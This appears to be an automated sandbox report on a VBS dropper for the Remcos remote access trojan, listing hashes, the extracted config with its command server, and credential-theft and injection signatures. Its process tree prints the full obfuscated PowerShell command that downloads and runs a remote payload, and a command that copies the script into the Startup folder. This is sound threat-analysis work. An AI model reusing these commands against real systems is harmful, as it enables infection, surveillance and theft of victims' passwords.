Overview

overview

10

Static

static

c1d6fcea01...ce.vbs

windows7-x64

10

c1d6fcea01...ce.vbs

windows10-2004-x64

10

Resubmissions

10-09-2022 11:44

220910-nwl3vsaag7 10

09-09-2022 16:16

220909-tq9vmageg6 10

Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10-09-2022 11:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c1d6fcea01ed82777e63ebc9e6f085ce.vbs

  • Size

    2KB

  • MD5

    c1d6fcea01ed82777e63ebc9e6f085ce

  • SHA1

    5497cee7b0f9b4f7f81491779e88edd83f167a15

  • SHA256

    de7a6bf628cdb1265197ea78967808850230114acb014cd0a39aa36adf2832f7

  • SHA512

    d1ea396de7dc2204733d113e2fed0d89b93c61cf7165ff9798a858712a81c4d9ad6a78eb0f75271f9df9e590d85c9e328ee9ce1348d01c66e0a446cda8d07611

Score
10/10
remcosaugb22collectionratspywarestealer

Malware Config

Extracted

Family

remcos

Botnet

AUGB22

C2

saptransmissions.dvrlists.com:55026

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    AUGB22

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    AUGB22-JJZGN0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    wikipedia;solitaire;

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01010110,01101001,01110011,01100001,00101111,01010000,01100001,01111001,01100001,01100010,01101100,01100101,01110011,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='I' + 'EX';sal P $o00;([system.String]::Join('', $gf))|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:1032
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:808
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jemjy"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1972
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thauzmma"
            4⤵
            • Accesses Microsoft Outlook accounts
            PID:540
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\thauzmma"
            4⤵
              PID:1352
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebfmaexcfxw"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1d6fcea01ed82777e63ebc9e6f085ce.vbs'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:1744
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1704

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\jemjy
        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        5d4b7ff5508f5ed166fc9f63a2f477a1

        SHA1

        b86bca5521c7ea20bd45e5763a732fe4af4dd10f

        SHA256

        fbfac4755037c1ba7f7cd92de8fa3c729897190711503cf9c21fa957746b6e4a

        SHA512

        3e126fe3b2c9863b821c2f7ee003ec8804f1e084c8ec48f65c1362a6e2fc6e91295ef78778ed4e560252e28ff4de9b565100e0ac7ff2b4ae8fa51c32676e4214

        Download Submit

      • \Users\Admin\AppData\Local\Temp\2101ac6b-6b9b-440a-8e07-e6cc53c9bc33\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        Download Submit

      • memory/540-106-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

        Download

      • memory/540-102-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

        Download

      • memory/540-95-0x0000000000455238-mapping.dmp

        Download

      • memory/808-91-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-78-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-107-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-93-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-86-0x00000000004327A4-mapping.dmp

        Download

      • memory/808-89-0x0000000074AB1000-0x0000000074AB3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/808-85-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-83-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-81-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-80-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-79-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-73-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-74-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/808-76-0x0000000000400000-0x000000000047F000-memory.dmp

        Filesize

        508KB

        Download

      • memory/1316-72-0x000007FEF28F0000-0x000007FEF2A74000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1316-63-0x000007FEF31E0000-0x000007FEF3D3D000-memory.dmp

        Filesize

        11.4MB

        Download

      • memory/1316-56-0x0000000000000000-mapping.dmp

        Download

      • memory/1316-61-0x000007FEF3D40000-0x000007FEF4763000-memory.dmp

        Filesize

        10.1MB

        Download

      • memory/1316-65-0x0000000002794000-0x0000000002797000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1316-68-0x000000000279B000-0x00000000027BA000-memory.dmp

        Filesize

        124KB

        Download

      • memory/1316-87-0x0000000002794000-0x0000000002797000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1316-90-0x000000000279B000-0x00000000027BA000-memory.dmp

        Filesize

        124KB

        Download

      • memory/1640-96-0x0000000000422206-mapping.dmp

        Download

      • memory/1640-100-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/1744-69-0x00000000024B4000-0x00000000024B7000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1744-67-0x000000001B760000-0x000000001BA5F000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/1744-70-0x00000000024BB000-0x00000000024DA000-memory.dmp

        Filesize

        124KB

        Download

      • memory/1744-64-0x000007FEF31E0000-0x000007FEF3D3D000-memory.dmp

        Filesize

        11.4MB

        Download

      • memory/1744-57-0x0000000000000000-mapping.dmp

        Download

      • memory/1744-101-0x00000000024BB000-0x00000000024DA000-memory.dmp

        Filesize

        124KB

        Download

      • memory/1744-62-0x000007FEF3D40000-0x000007FEF4763000-memory.dmp

        Filesize

        10.1MB

        Download

      • memory/1744-66-0x00000000024B4000-0x00000000024B7000-memory.dmp

        Filesize

        12KB

        Download

      • memory/1960-54-0x0000000001D30000-0x0000000001D40000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1960-55-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1972-94-0x0000000000476274-mapping.dmp

        Download

      • memory/1972-103-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/1972-104-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download